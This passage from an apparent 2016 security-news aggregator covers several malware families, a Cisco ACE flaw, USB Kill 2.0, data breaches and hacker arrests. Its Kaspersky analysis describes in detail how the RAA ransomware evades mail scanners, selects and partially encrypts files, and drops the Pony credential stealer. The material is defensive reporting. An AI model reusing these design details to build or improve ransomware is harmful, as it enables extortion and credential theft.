One of the most interesting features of the Mal/Miner-C malware is its ability to abuse FTP servers in an effort to spread itself.

Some samples analyzed by the researcher included a module, called tftp.exe, which randomly generates IP addresses and attempts to connect to them using a predefined list of login credentials.

If the threat is able to successfully connect to an FTP service, then it copies itself to that server and modifies the .html and .php files stored on it by injecting the code that generates an iframe referencing the malicious code uploaded to the server.

“If the embedded credentials are able to successfully connect to an FTP service, it tries to copy itself to the server and modify an existing web-related file with the extension .htm or .php in an attempt to further infect visitors to the host system.” reads the analysis from Sophos.

“If a file with this extension is found, the threat injects source code that creates an iFrame referencing the files info.zip or Photo.scr. “

When an unaware user visits a website compromised by the malware, he is presented with a “save file” dialog that serves the malicious files, then is the victim downloads and open them will infect its PC with Mal/Miner-C.

According to Sophos, more than 1.7 million infections were observed in the first half of 2016, but they were associated to only 3,150 unique IP addresses because the malware copies itself to every folder on a compromised FTP server.

The experts focused their investigation on the search for vulnerable devices on the internet. A first scan with the Censys search engine identified just under 3 million FTP servers worldwide.

Then the researchers tried to connect anonymously to the FTP services with a scanning script in order to find “Anonymous FTPs with write access”

The results were as follows:

IP numbers of FTP servers on original list: 2,932,833.
FTP servers active during the test: 2,137,571 Active servers allowing anonymous remote access: 207,110.
Active servers where write access was enabled: 7,263.
Servers contaminated with Mal/Miner-C: 5,137.
Mal/Miner-C -infections

The malware targeted various types of FTP servers, but Sophos experts noticed it mostly targeted Seagate’s Central NAS product. This specific NAS provides a public folder that cannot be deleted or deactivated, the attackers use to upload the malware in the folder in hopes that they will be executed by users once they are discovered.

Be careful, the malware is not able to infect the device but exploits to infect other to spread in the wild.

The experts also analyzed the wallets used by the cybercriminals behind the campaign and determined that infected machines mined roughly $86,000 in Monero.

LuaBot is the first Linux DDoS botnet written in Lua Language

11.9.2016 securityaffairs Virus

The researcher MalwareMustDie discovered LuaBot, a trojan completely coded in Lua language that is targeting Linux platforms to recruit them in DDoS botnet.
Let’s continue our tour in Linux security, focusing on malicious code specifically designed to target such systems.

The popular security researcher MalwareMustDie, who recently reported the new ELF trojan backdoorLinux/Mirai, also discovered a Trojan that infects Linux systems involved in distributed denial of service (DDoS) attacks.

The malware was dubbed Linux/Luabot beacause it is written in the Lua programming language (version 5.3.0) and targets the Linux based systems.

Lua is a lightweight multi-paradigm programming language, it is cross-platform since it is written in ANSI C. It was designed primarily for embedded systems and clients.

Web servers and Internet of Things (IoT) devices are privileged targets of the Linux/Lua botnet.

“On Mon, Aug 29, 2016 at 5:07 PM I received this ELF malware sample from a person (thank you!). There wasn’t any detail or comment what so ever just one cute little ARM ELF stripped binary file with following data:” wrote the researcher in a blog post.

“This is a new ELF botnet malware, coded in Lua [link] language ( @$LuaVersion: Lua 5.3.0). It is the first time to find an lua language ELF compiled malware, specifically in ARM cpu architecture, so let’s call it as “Linux/LuaBot”.”

The analysis of the binary revealed the signature of Sample Matrix RSA-4096 Certificate, it’s a trace of the MatrixSSL certification used by the bot clients to establish secure HTTPS connections.

The binary also included the MatrixSSL’s code libraries for encryption operations and a MalwareMustDie also noticed it included a hardcoded coder’s message (“Hi. Happy reversing, you can mail me: [REDACTED .ru email address].”) reported in the following image.

LuaBot linux/lua botnet binary

The bot was controlled by a C&C server hosted in the Netherlands on the infrastructure of dedicated server hosting service WorldStream.NL.

MalwareMustDie also discovered a portion of code labeled as “penetrate_sucuri,” likely referencing the implementation of avoidance mechanism that are able to elude the popular Sucuri Web Application Firewall.

The researcher has no doubt, this is a very complex and effective botnet, the author of the Linux/Lua botnet implemented a command interface that could be exploited to run crypted remote commands.

“If you see carefully in the above description, there are the “cmdline”, and “cmdline args” spotted in several parts in ELF reversed code, forensics results and also source code trace too.” explained MalwareMustDie.

“The hacker can do a lot of things with it via a crypted remote commands pushed to his bots through this command interface, so this bot can be used to execution for the Lua script. So one of the botnet functionality is the remote execution via this interface.” states the analysis.

A rapid test on the online scanning service VirusTotal demonstrated that the binary was still fully undetected (FUD) state at the time of the analysis.

MalwareMustDie received after his first analysis the DDoS component used by the Linux/Lua botnet, it was the missing component it was searching for. Also in this case, the module was written in Lua and has zero-detection rate.

“This sample [link] is explaining the “missing link” of the DDoS function expected from this botnet. This module was coded in Lua and using the same static compilation environment, with zero detection ratio too. This additional ELF could be “the payload” that we are waiting for. This module is explaining a lot of detail on how the attack is performed, a simple download and execution command executed by the infected nodes from remote access via shell or internal command line interface is enough to trigger this attack.” explained the researchers.

According to MalwareMustDie the number of ELF malware that are surfacing on the Internet is rapidly growing.

“There are plenty new ELF malware coming & lurking our network recently & hitting out Linux layer IoT and services badly.” explained the researcher.

The data is confirmed also by the investigation conducted by other research teams, a joint research conducted by Level 3 Communications and Flashpoint allowed the identification of a million devices infected by the Bashlite malware.

The BASHLITE malware includes the code of the ShellShock exploit and it had been used by threat actors in the wild to run distributed denial-of-service (DDoS) attacks.

It could infect multiple Linux architectures, for this reason, crooks used it to target Internet of Things devices.

In June, experts from the security firm Sucuri spotted a botnet composed of tens of thousands of CCTV devices that had been used by crooks to launch DDoS attacks against websites.

I suggest you reading the MalwareMustDie analysis on the Luabot, it is full of interesting data.

CVE-2016-6399 – CISCO disclosed unpatched flaw in ACE products
11.9.2016 securityaffairs Vulnerebility

Cisco disclosed the existence of the CVE-2016-6399 flaw that can be exploited by remote unauthenticated attackers to trigger DoS conditions in ACE products.
Experts at Cisco have disclosed the existence of a high-severity vulnerability, tracked as CVE-2016-6399, that can be exploited by remote unauthenticated attackers to trigger DoS conditions in some of Application Control Engine (ACE) products.

The good news is that there is no evidence that the CVE-2016-6399 vulnerability has been exploited in the wild, the bad news is that some CISCO customers experienced problems after an Internet research project triggered the vulnerability.

Researchers behind the research project had been scanning SSL/TLS servers on the Internet, including the CISCO customers.

“A vulnerability in the SSL/TLS functions of the Cisco ACE30 Application Control Engine Module and the Cisco ACE 4700 Series Application Control Engine Appliances could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on the affected device.” reads the Cisco Security Advisory.

The problem affects Cisco ACE 4710 Application Control Engine appliances and Cisco ACE30 Application Control Engine modules.

The Cisco ACE 4710 Application Control Engine equipment is a protection solution designed to enhance application availability and performance and improve the resilience to cyber attacks.

CVE-2016-6399 CISCO ACE 4710 products

The network appliances implement load-balancing and application delivery features. The root cause of the security issue is the insufficient input validation checks in SSL/TLS code that can be exploited remotely by an unauthenticated attacker to trigger devices to reload by sending them specially crafted SSL/TLS packets.

“The vulnerability is due to incomplete input validation checks in the SSL/TLS code. An attacker could exploit this vulnerability by sending specific SSL/TLS packets to the affected device. An exploit could allow the attacker to trigger a reload of the affected device.” continues the advisory.

The flaw was discovered while the Cisco experts were handling customer support requests.

The products affected by the CVE-2016-6399 vulnerability reached the end of life in July 2013, but CISCO is still offering support for them, the company plan to do it until January 2019. Cisco has promised to release software updates that address the issue.

At the time I was writing there is no workaround, Cisco plan to release software updates as soon as possible.

I suggest you give a look to the CISCO security advisory that included useful information on the flaw, including the indicators of compromise (IoC) that can help customers to avoid attackers to exploit the flaw.

PIL filed in Court to Ban ‘Pokémon Go’ in India for Hurting Religious Sentiments
10.9.2016 thehackernews IT
Pokémon GO has yet not been officially launched in India, but the location-based augmented reality game has already fueled a privacy debate and request for Ban.
Isn't that weird?
A Gujarat resident, Alay Anil Dave has recently filed a Public Interest Litigation (PIL) in the Gujarat High Court against Niantic, developers of Pokémon Go, over allegations that the game is hurting religious sentiments of Hindus and Jains by showing virtual eggs in places of worship of different religious groups.
The launch date of Pokémon GO for India has not been announced so far, but millions of Indians have already downloaded the game from 3rd-party app markets and playing it on the streets.
However, there are many still waiting for an official release of the game in India, as they don’t want to end up installing malicious versions of Pokémon GO that could install malware on their phones, allowing hackers to compromise their devices.
Pokémon GO has become the most successful game launch of all time with more than 500 Million downloads in just over two months and has been making rounds since its inception just over two months ago.
This game is reported to have almost as many daily active users on Twitter.
Also Read: 6 Important Things You Should Know Before Playing Pokémon GO
In fact, Niantic Labs CEO John Hanke just announced that the Pokémon Go game app is coming to the Apple Watch on stage at Apple's iPhone 7 event on Wednesday.
How Does Pokémon GO Hurt Religious Sentiments?
But Why does Petitioner want India to Ban Pokémon GO?
Actually, this augmented reality game requires gamers to walk around homes, parks and local surroundings to find new Pokémon characters, as well as achieve goals like hatching incubating eggs.
One can find the most common Pokémon in the distance of 2km eggs, with the rarest ones in the 10km eggs. But, Niantic didn't know that some Indians have a problem with these eggs.
"People playing the game get their points in the form of eggs which generally appear in the places of worship of different religious groups. To find eggs in temples of Hindus and Jains is blasphemous, and therefore my client has sought ban on the game from the country," Dave's lawyer said.
However, we talked to some security experts and privacy advocates in India, who shared their opinions on the case.
Dinesh Bareja, Information security professional, and researcher at IndiaWatch, provided a statement to The Hacker News, saying:
"Such PIL are frivolous and just designed to get the person his few moments of fame. Chasing a virtual image into a temple or any other place cannot be termed desecration of the place of worship and, like many other PIL this is also going to be a waste of the valuable time of the Hon'ble Court."
Another Information security professional, who wants to remain anonymous, told us:
"Some Hindu temples still have a tradition of Bali of Animals [Animal sacrifice]. So painting all Hindu temples as a symbol of non-violence and hurting religious sentiments isn't true."
The Editor of Cyber Secure India Portal said,"There seems no strength in the PIL, frankly speaking. However, the PIL may just be appropriate, if the person who has filed the PIL, should have obtained a legitimate licensed copy of the game; otherwise, the charge may be dropped. Further, the fact that egg was found is a question of perception, being an animated pictorial representation."
Pokémon Go, Privacy and National Security
Along with hurting religious sentiments by displaying eggs in houses of worship, the PIL also cites that Pokémon Go could be used by the CIA to create maps of sensitive "areas currently unavailable in Google Maps."
Adv. Prashant Mali, Cyber Security Law Specialist Lawyer, told The Hacker News that he is primarily concerned about privacy and accidents occurred due to this game.
"It has become a fashion to file a PIL and get cheap and fast publicity. There are other games which children play which has a lot more violence and some games do promote sexual violence," Mali said.
"I feel Government at this rate of censorship may appoint a Censor Board like films to moderate even video games. When the game gets launched in India, they may take care of religious feelings by default now it is an illegal game so the PIL may get dismissed even."
The PIL also raised some concerns over the game, like an infringement of the right to privacy, a threat to the life of players who walk around the street to catch Pokémons, game’s influence on the minds of children and "behavior as an Indian," among others.
“All the maps are via open maps, already in the public domain so that issue is sorted. Use of AR in sensitive areas from government viewpoint can be a problem. To avoid this, use of camera phones and recorders should be banned in such sensitive declared as it is not just one game that can cause issues.” an anonymous follower comments.
The PIL was heard on Wednesday by a division bench of Chief Justice R. Subhash Reddy and Justice Vipul Pancholi, and notice by the Gujarat High Court has been issued to Niantic Inc. of the US, which has yet to respond.
If Pokémon GO gets banned in India, it will not be the first country to do so. Last month, Iran officially banned Pokémon GO within the country due to certain "security concerns."

Doctor Web discovers the first Linux Trojan that is written in Rust language
10.9.2016 securityaffairs Virus

Experts from Dr Web discovered a new Linux Trojan called Linux.BackDoor.Irc.16 that is written in the Rust programming language.
It is a prolific period for Vxers working on Linux Trojan, a new strain was recently spotted by experts from Doctor Web. The new Linux Trojan has been named Linux.BackDoor.Irc.16 and is written in the Rust programming language.Rust is a general-purpose, multi-paradigm, compiled programming language promoted by Mozilla Research. It is designed to be a “safe, concurrent, practical language.”
“Rust is a systems programming language that runs blazingly fast, prevents segfaults, and guarantees thread safety. “

“Unlike the majority of its counterparts, Linux.BackDoor.Irc.16 is written in Rust, a programming language whose creation was sponsored by Mozilla Research. ” reported Dr. Web in a blog post.

The Linux.BackDoor.Irc.16 Linux Trojan implements the features of a classical backdoor that allow attackers to remotely control the infected system by sending it via the IRC (Internet Relay Chat) protocol.

Once the Linux Trojan is executed it connects to a specific public chat channel that is indicated in its configuration, then it waits for commands.

linux trojan linux_backdoor_irc16-1

According to malware researchers from DrWeb, the Linux Trojan is able to execute just four commands: It can connect to a specified chat channel; send cybercriminals information about an infected computer; send cybercriminals data about the applications running in a

Connect to a specified chat channel;
Gather information on the infected host and send them back to the crooks;
Send crooks data about the applications running in the system;
Delete itself from an infected machine;
The experts spotted a first stable version in 2015, according to Dr Web, the Linux.BackDoor.Irc.16 backdoor was designed to be a cross-platform malware. The experts who have analyzed the threat speculate it is a prototype for an ongoing project, they noticed in fact that it Linux Trojan is not able to replicate itself and the IRC channel used as C&C infrastructure are no more active.

“Doctor Web’s analysts believe that Linux.BackDoor.Irc.16 is, in fact, a prototype (Proof of Concept), because it cannot replicate itself, and the IRC channel used by the Trojan to receive commands from cybercriminals is not currently active.” reported Dr Web.

Recently other Linux malware were spotted in the wild by security experts such as the Linux.Rex.1 that is capable of self-spreading and create a peer-to-peer botnet and Linux.Lady that is used by crooks to mine cryptocurrency.

Oh, It's On Sale! USB Kill to Destroy any Computer within Seconds
9.9.2016 thehackernews Hacking

Remember Killer USB stick?
A proof-of-concept USB prototype that was designed by a Russian researcher, Dark Purple, last year, to effectively destroy sensitive components of a computer when plugged in.
Now, someone has actually created the Killer USB stick that destroys almost anything – such as Laptops, PCs, or televisions – it is plugged into.
A Hong Kong-based technology manufacturer is selling a USB thumb drive called USB Kill 2.0 that can fry any unauthorized computer it's plugged into by introducing a power surge via the USB port. It costs $49.95.
How does USB Kill 2.0 work?
As the company explains, when plugged in, the USB Kill 2.0 stick rapidly charges its capacitors via the USB power supply, and then discharges – all in a matter of seconds.
The USB stick discharges 200 volts DC power over the data lines of the host machine and this charge-and-discharge cycle is repeated several numbers of times in just one second, until the USB Kill stick is removed.
"When tested on computers, the device isn't designed or intended to erase data," the company says. "However, depending on the hardware configuration (SSD [solid-state drive] vs. platter HDD [hard disk drive]), the drive controllers may be damaged to the point that data retrieval is impractical."
"Any public facing USB port should be considered an attack vector," the company says in a news release. "In data security, these ports are often locked down to prevent exfiltration of data or infiltration of malware, but are very often unprotected against electrical attack."
When And For Whom USB KILL Would Be Useful?
USB Kill stick could be a boon for whistleblowers, journalists, activists, and, not to forget, cyber criminals, who want to keep their sensitive data away from law enforcement as well as cyber thieves.
It is like, if you're caught, kill yourself. In the same fashion as terrorists do. Here I mean to kill the data from your laptop if the law enforcement has caught your laptop. And USB Kill stick does the same for you.
However, the company claims to have developed USB Kill 2.0 stick for the sole purpose of allowing companies to test their devices against USB Power Surge attacks and to prevent data theft via "Juice Jacking" attacks.
Video Demonstration
You can watch the video demonstration below by the company that shows USB Kill 2.0 stick in action.

The company claims about 95% of all devices available on the market today are vulnerable to power surge attacks introduced via the USB port.
However, the only devices not vulnerable to USB kill attacks are recent models of Apple's MacBook, which optically isolate the data lines on USB ports.
Juice jacking is a type of cyber attack wherein malware installed on a computer can surreptitiously copy data from a smartphone, tablet or other computers using a USB charging port that doubles as a data connection, typically over USB.
While USB Kill 2.0 has been "designed and tested to be safe," the company warns that the USB stick "is a high-voltage device" and is only meant for "responsible adults." Also, the company's website "strongly condemns the malicious use of its products."
USB Kill 2.0 also comes with a USB Protection Shield, called Test Shield, sold for additional $15.70, which is designed to allow testing of the USB Killer stick without destroying the host machine.

Google Chrome to Label Sensitive HTTP Pages as "Not Secure"
9.9.2016 thehackernews Safety
Although over three months remaining, Google has planned a New Year gift for the Internet users, who're concerned about their privacy and security.
Starting in January of 2017, the world's most popular web browser Chrome will begin labeling HTTP sites that transmit passwords or ask for credit card details as "Not Secure" — the first step in Google's plan to discourage the use of sites that don't use encryption.
The change will take effect with the release of Chrome 56 in January 2017 and affect certain unsecured web pages that feature entry fields for sensitive data, like passwords and payment card numbers, according to a post today on the Google Security Blog.
Unencrypted HTTP has been considered dangerous particularly for login pages and payment forms, as it could allow a man-in-the-middle attacker to intercept passwords, login session, cookies and credit card data as they travel across the network.
In the following release, Chrome will flag HTTP pages as "Not secure" with a neutral indicator in the address bar of incognito mode, where users may have higher expectations of privacy.
Then, in the future, Chrome will flag all HTTP sites as "Not secure" with the same red triangle indicator the browser currently uses to indicate a broken HTTPS website.
"Chrome currently indicates HTTP connections with a neutral indicator," Emily Schechter wrote in a blog post. "This doesn't reflect the true lack of security for HTTP connections. When you load a website over HTTP, someone else on the network can look at or modify the site before it gets to you."
This isn't the first time when Google is taking steps to encourage site owners to switch to HTTPS. Two years back, Google also made some changes to its search engine algorithm in an effort to give a ranking boost to the websites that use encrypted HTTPS connections.
Last month, Google also implemented HTTP Strict Transport Security (HSTS) on its main domain (google.com) in an effort to prevent users from navigating to websites using the insecure HTTP.
Google reported that today, more than half of the websites visited by Chrome users are already encrypted.
Not only Google, but Mozilla has also been encouraging users to adopt HTTPS through its Let's Encrypt project that provides free SSL/TSL certificates for website owners to help them implement HTTPS for their services. (Here's How to Install Free SSL Cert).

A malicious pairing of cryptor and stealer
9.9.2016 Kaspersky Virus
We have already seen some cryptor attacks where malicious programs with different functions have been used in combination. For example, one version of the Shade cryptor checks victim computers for signs of accounting activity; if it finds any, it doesn’t encrypt the files, but instead installs remote control tools in the infected system. The bot can then be used by cybercriminals to steal money, a much more profitable outcome than just receiving a ransom to decrypt some files.

The owners of the RAA cryptor, however, took a different tack. The Trojan is delivered in emails that mostly target corporate users. After a successful infection, RAA executes its main task, i.e. encrypts the user’s files. However, it doesn’t stop there: some versions of RAA also include a Pony Trojan file, which steals confidential information from the infected computer. Using the stolen data, the cybercriminals can gain access to the victim’s mail clients and other resources. We can assume that the owners of RAA use these resources to carry out targeted attacks – sending out emails with the cryptor malware to the addresses on the victim’s contact list. This substantially improves the probability of subsequent infections.

In this article, we will provide details of how a pair of malicious programs – a new version of the RAA cryptor and the Pony stealer Trojan – work in unison.

The RAA cryptor

The RAA cryptor (Kaspersky Lab verdict: Trojan-Ransom.JS.RaaCrypt) was first detected in June 2016. It caught the attention of researchers and analysts due to the fact that it was written entirely in JavaScript, which is a rarity when it comes to ransomware cryptor Trojans.

We recently detected a new version of this Trojan that has a few differences from earlier known modifications. Let’s have a closer look at this particular sample, which has been assigned the verdict Trojan-Ransom.JS.RaaCrypt.ag.


The body of this new version of RAA is a script in JScript (with a .js file extension). The malicious script is sent to potential victims attached to a spam message in a ZIP file with the password ‘111’.

The attack is aimed primarily at corporate users: the message mimics finance-related business correspondence, and the script’s name is similar to those shown below:

Счета на оплату _ август 2016 согласовано и отправлено контрагенту для проведения оплаты _aytOkOTH.doc.js (Invoice_August 2016 approved and sent to contractor for payment _aytOkOTH.doc.js)

Счета на оплату _ август 2016 согласовано и отправлено контрагенту для проведения оплаты _EKWT.doc.js (Invoice_August 2016 approved and sent to contractor for payment _ EKWT.doc.js)

A malicious pairing of cryptor and stealer

“Let’s presume we made a concession when we allowed you to postpone your due payment.

“We understand you may have difficulties, but do we have to wait for another two months? To be honest, we don’t really want to go to court. Please make all the payments in next few days.”

The message includes a notice saying:

“The company… notifies you that in line with internal security regulations, all outgoing emails are subject to asymmetric encryption. Dear client, your password for this message is 111.”

People who know what ‘asymmetric encryption’ is will probably just smile at this; however, the message is obviously targeting a different audience.

It should be noted that sending malicious content in a password-protected archive is a well-known trick used by cybercriminals to prevent anti-malware systems installed on mail servers from unpacking the archive and detecting any malicious content. To unpack an archive like this, the anti-malware product must automatically retrieve the password from the message, which isn’t always possible.

For an infection to occur, users have to unpack the archive themselves and launch the .js file.

Script obfuscation

The code of the malicious script was deliberately obfuscated to complicate things for malware analysts. The content of the script looks like this in the source code:

A malicious pairing of cryptor and stealer

Fragment of the obfuscated code

If we restore the line breaks and indents, it becomes obvious that the obfuscation involves renamed variables and functions, as well as strings hidden in the global array. After de-obfuscation and function renaming, the same section of code becomes much easier to read.

A malicious pairing of cryptor and stealer

Fragment of de-obfuscated code

The script is nearly 3,000 lines long. Most of this is taken up by an implementation of the legitimate DLL CryptoJS, and an implementation of the RSA encryption procedure, which was also taken from public sources by the cybercriminals.

How the Trojan works

To lull the victim into a false sense of security, the RAA cryptor demonstrates a fake Microsoft Word document immediately after it launches. This document is in fact an RTF file specially crafted by the cybercriminals. (The document is contained in the Trojan’s body encoded in Base64 format.)

A malicious pairing of cryptor and stealer

The fake document displayed to the victim

While the user is reading the message about a document that’s supposedly not being displayed properly, the Trojan is doing its dirty work:

Registers itself to be autostarted with Windows;
Deletes the registry key associated with the VSS service (to prevent the restoring of files from shadow copies);
Sends a request to the C&C server (unlike all previous versions of this Trojan, this version doesn’t wait for the delivery of keys from the server – the request is only sent so the cybercriminals can collect statistics);
Proceeds to search for files and encrypts them.
Key generation

Unlike earlier RAA modifications, this version of the cryptor does not request an encryption key from the C&C. Instead, the Trojan generates a session key on the client. To do so, it calls the WinAPI function RtlGenRandom which is considered a cryptographically secure generator of pseudorandom numbers.

To ensure it can call WinAPI functions from JS code, the Trojan uses a legitimate third-party OCX component called DynamicWrapperX. The Trojan stores it in its body in a Base64-encoded format, and installs it in the infected system. RAA has both 32-bit and 64-bit versions of DynamicWrapperX so it can attack systems running under both Windows architectures.

The Trojan encrypts the generated session key with an RSA algorithm (the public RSA-2048 key is contained within the script) and saves it to a file with the name “KEY-…”, where the multiple periods stand for a unique 36-character infection ID.

File encryption

RAA searches for and encrypts files with the extensions .doc, .xls, .rtf, .pdf, .dbf, .jpg, .dwg, .cdr, .psd, .cd, .mdb, .png, .lcd, .zip, .rar, .csv whose names do not contain the substrings “.locked”, “~”, “$”.

When searching for files, the Trojan skips folders named “WINDOWS”, “RECYCLER”, “Program Files”, “Program Files (x86)”, “Windows”, “Recycle.Bin”, “RECYCLE.BIN”, “Recycler”, “TEMP”, “APPDATA”, “AppData”, “Temp”, “ProgramData”, and “Microsoft”.

When processing each file, RAA uses the session key to generate a file key and initialization vector (IV). The contents of the files are encrypted in different ways depending on the file size:

0 to 6,122 bytes: the file is encrypted in full.
6,123 to 4,999,999 bytes: three fragments are selected for encryption in different sections of the file. The first, 2000- to 2040-byte fragment is selected at the beginning of file; the location and size of the two other fragments depend on the size of the first fragment and the overall size of the file.
5,000,001 to 500,000,000 bytes: two fragments of 90000-125000 bytes are selected for encryption (from the beginning and end of the file).
500,000,001 bytes and larger: not encrypted.
A string is added at the end of the encrypted file that contains “IDNUM” (infection ID), “KEY_LOGIC” (indexes to construct the file key from the session key), “IV_LOGIC” (indexes to construct the IV from the session key), and “LOGIC_ID” (possible values are “1”, “2” or “3” – the selected encryption method depending on the file size). The encrypted file is given the additional extension .locked.

A malicious pairing of cryptor and stealer

The string added to the end of the encrypted file

Ransom demand

When the files are encrypted, RAA displays a file with the cybercriminals’ demands and contacts in WordPad. The Trojan fills the text template with a 36-character ID which is unique for each case.

A malicious pairing of cryptor and stealer

The file containing the cybercriminals’ demands

The cybercriminals suggest that the victims purchase a file decryption key and software from them. Two methods of communication are available: email and the Bitmessage service. The victim is expected to pay for the decryption key in bitcoins.

Plus a stealer Trojan

The damage caused by the Trojan is not limited to encrypting files. Like some of the earlier versions of RAA, the version we are examining has some added features. The Trojan contains an executable file encoded in Base64, which it writes to the hard drive at ‘C:\Users\<username>\Documents\ii.exe’ and launches after it has finished encrypting files. Analysis revealed that ‘ii.exe’ is none other than Pony, a known password-stealing Trojan (detection verdict: Trojan-PSW.Win32.Tepfer.gen).

Pony has proved to be an unusually long-lived Trojan. Its early versions supposedly emerged back in 2011, while in December 2013, as reported by the mass media, it stole the credentials of over 2 million users.

Naturally, after all that time Pony’s source code appeared on the web at some point. Analysis showed that the executable file we are analyzing here was constructed using Pony source code.

Pony: confidential data theft

To recap, Pony’s main task is to collect confidential information from an infected computer and then send it to the cybercriminals.

Step 1. Stealing information

Below is a short list of the information that Pony hunts for.

Passwords stored in web browsers
Microsoft Internet Explorer Google Chrome Opera
Mozilla Firefox K-Meleon Яндекс.Браузер
Credentials to dozens of the most popular FTP clients
CuteFTP 6\7\8\9\Pro\Lite FTP Navigator FlashFXP 3\4
FileZilla FTP Commander Bullet Proof FTP Client
COREFTP FTP Explorer ClassicFTP
FTPVoyager LeechFTP WinFTP
FTPGetter ALFTP BlazeFtp
Robo-FTP 3.7 NovaFTP FTP Surfer
LinasFTP Cyberduck WiseFTP
Accounts with the most widespread mail clients
Microsoft Outlook Mozilla Thunderbird The Bat!
Windows Live Mail Becky! Internet Mail Pocomail
Various cryptocurrency wallet files
PPCoin Primecoin Feathercoin
ProtoShares Quarkcoin Worldcoin
Infinitecoin Fastcoin Phoenixcoin
The Trojan also has the following capabilities:

Pony steals the user’s digital certificates.
Pony stores a list of the most widespread combinations that users use as passwords. Using this list, it attempts to gain access to the accounts on an infected computer.
Step 2. Data encryption and sending

Before sending the collected information to cybercriminals, Pony encrypts it using the RC4 algorithm. When doing so, the Trojan keeps records of the checksums for the obtained data (slightly modified results of the CRC32 algorithm are used.) The sequence is as follows:

Calculate the checksum of the non-encrypted data.
Write the obtained value next to the input data.
Encrypt input data with the RC4 algorithm using the key that the cybercriminals specified when they compiled the Trojan.
Calculate the checksum of the encrypted data.
Write the obtained value next to the input data.
Generate a random 4-byte key
Encrypt the input data with the RC4 algorithm using the generated key.
Generate a data package ready for sending that can be described with a ToSend structure (see below)

struct ToSend
dword random_key;
byte* double_encrypted_data;
struct ToSend
dword random_key;
byte* double_encrypted_data;
A malicious pairing of cryptor and stealer

A non-encrypted fragment of the generated report

A malicious pairing of cryptor and stealer

Fragment of the report that is ready for sending. The encryption key is highlighted in red

When the data is brought up to the required form, Pony sends it to the cybercriminals.

Two alleged members of Crackas With Attitude group arrested for hacking US Gov Officials
9.9.2016 securityaffairs Hacking

U.S. authorities have arrested two alleged members of the Crackas With Attitude group involved in dumping details of officials with the FBI and the DHS.
The FBI has identified and arrested two men from North Carolina men that are suspected to be members of the notorious ‘Crackas With Attitude‘ hacker group that dumped details of government agents last year.

The hackers leaked the personal details of 31,000 government agents belonging to nearly 20,000 FBI agents; 9,000 Department of Homeland Security (DHS) officers and some number of DoJ staffers.

Crackas With Attitude tweet

Crackas with Attitude went in the headlines due to the of senior officials at the CIA, FBI, the White House, Homeland Security Department, and other US federal agencies.

In October 2015 the group violated the CIA Director’s personal email account and leaked sensitive files including a top-secret application for a security clearance.

In January 2016, a hacker associated with the Crackas With Attitude group has accessed accounts belonging to the director of National Intelligence, James Clapper. The group also broke into the AOL email of the FBI Deputy Director Mark Giuliano.

The two suspects arrested by the authorities are Andrew Otto Boggs (22), of North Wilkesboro, N.C., who went online with the handle “INCURSIO,” and Justin Gray Liverman (24), of Morehead City, who used the handle “D3F4ULT.”

According to a press release by Department of Justice, the two men were arrested on Thursday morning on charges of computer hacking.

“Andrew Otto Boggs, aka “INCURSIO,” 22, of North Wilkesboro, North Carolina, and Justin Gray Liverman, aka “D3F4ULT,” 24, of Morehead City, North Carolina, were arrested today on charges related to their alleged roles in the computer hacking of several senior U.S. government officials and U.S. government computer systems.” reads the press release.

“According to charging documents filed with the court, Boggs and Liverman conspired with members of a hacking group that called itself “Crackas With Attitude.” From about October 2015 to February 2016, the group used “social engineering” hacking techniques, including victim impersonation, to gain unlawful access to the personal online accounts of senior U.S. government officials, their families, and several U.S. government computer systems. “


In February, British police and the FBI arrested a 16-year-old British teenager suspected of being a member of the dreaded group.

“In some instances, members of the conspiracy uploaded private information that they obtained from victims’ personal accounts to public websites; made harassing phone calls to victims and their families; and defaced victims’ social media accounts,” reads the press release.According to the FBI officials, between October 2015 to February 2016, the hacking group used social engineering in order to trick the victims into revealing their account number, password, and other details.

The two men will have their initial appearances at the federal courthouse in Alexandria next week in front of U.S. Magistrate Judge Theresa Carroll Buchanan.

Over 33 Million QIP.ru accounts hacked compromised in an old data breach

9.9.2016 securityaffairs Hacking

Another old and huge data breach was reported to LeakedSource, more than 33 million QIP records from 2011 have been compromised.
Once again we are here to discuss a data breach, the victim is the Russian instant messaging service Quiet Internet Pager (QIP.ru.). According to the breach notification service LeakedSource, the leaked dump includes details of more than 33 Million users and the data breach dates back to June 2011.


LeakedSource @LeakedSource
Another old mega breach added: 33 million QIP.ru records from 2011. Search yourself on #LeakedSource at https://www.leakedsource.com/
04:56 - 9 Set 2016
4 4 Retweet 4 4 Mi piace
Records belonging to 33,383,392 Quiet Internet Pager (QIP) were disclosed by the same hacker that recently that leaked tens of millions of accounts stolen from several popular services, including the Russian web portal Rambler, Mail.ru, Last.fm , Dota ,L inkedIn , Myspace, and VerticalScope.

Security experts from HEROIC who have analyzed the leaked confirmed that records include email addresses, usernames, and passwords in plain text.

The experts believe the archive dates back to 2009-2011, a close look at the compromised accounts reveals that one of three is associated with Mail.Ru email addresses, followed by Yandex (2.5 million), Rambler (2 million) and Gmail (925,000).

Also in this case, Top passwords are 123456, 123123, 111111 and 123456789.

FBI Arrests Two Hackers Who Hacked US Spy Chief, FBI and CIA Director
9.9.2016 thehackernews Hacking
US authorities have arrested two North Carolina men on charges that they were part of the notorious hacking group "Crackas With Attitude."
Crackas with Attitude is the group of hackers who allegedly was behind a series of audacious and embarrassing hacks that targeted personal email accounts of senior officials at the CIA, FBI, the White House, Homeland Security Department, and other US federal agencies.
Andrew Otto Boggs, 22, of North Wilkesboro, N.C., who allegedly used the handle "INCURSIO," and Justin Gray Liverman, 24, of Morehead City, who known online as "D3F4ULT," were arrested on Thursday morning on charges related to their alleged roles in the computer hacking, according to a press release by Department of Justice.
A 16-year-old British teenager suspected of being part of the group was arrested in February by the FBI and British police.
Although court documents did not name the victims, the hacking group had allegedly:
Hacked into the AOL email of CIA director John Brennan and released personal details.
Hacked into the personal emails and phone accounts of the US spy chief James Clapper.
Broke into the AOL email of the FBI Deputy Director Mark Giuliano.
Cracka also leaked the personal details of 31,000 government agents belonging to nearly 20,000 FBI agents; 9,000 Department of Homeland Security (DHS) officers and some number of DoJ staffers.
"In some instances, members of the conspiracy uploaded private information that they obtained from victims’ personal accounts to public websites; made harassing phone calls to victims and their families; and defaced victims’ social media accounts," reads the press release.
According to the FBI officials, between October 2015 to February 2016, the hacking group used social engineering in order to trick the victims into revealing their account number, password, and other details.
Boggs and Liverman will be extradited next week to the Eastern District of Virginia, where federal prosecutors have spent months building a case against Crackas With Attitude.

Banking Trojan, Gugi, evolves to bypass Android 6 protection
9.9.2016 Kaspersky Android
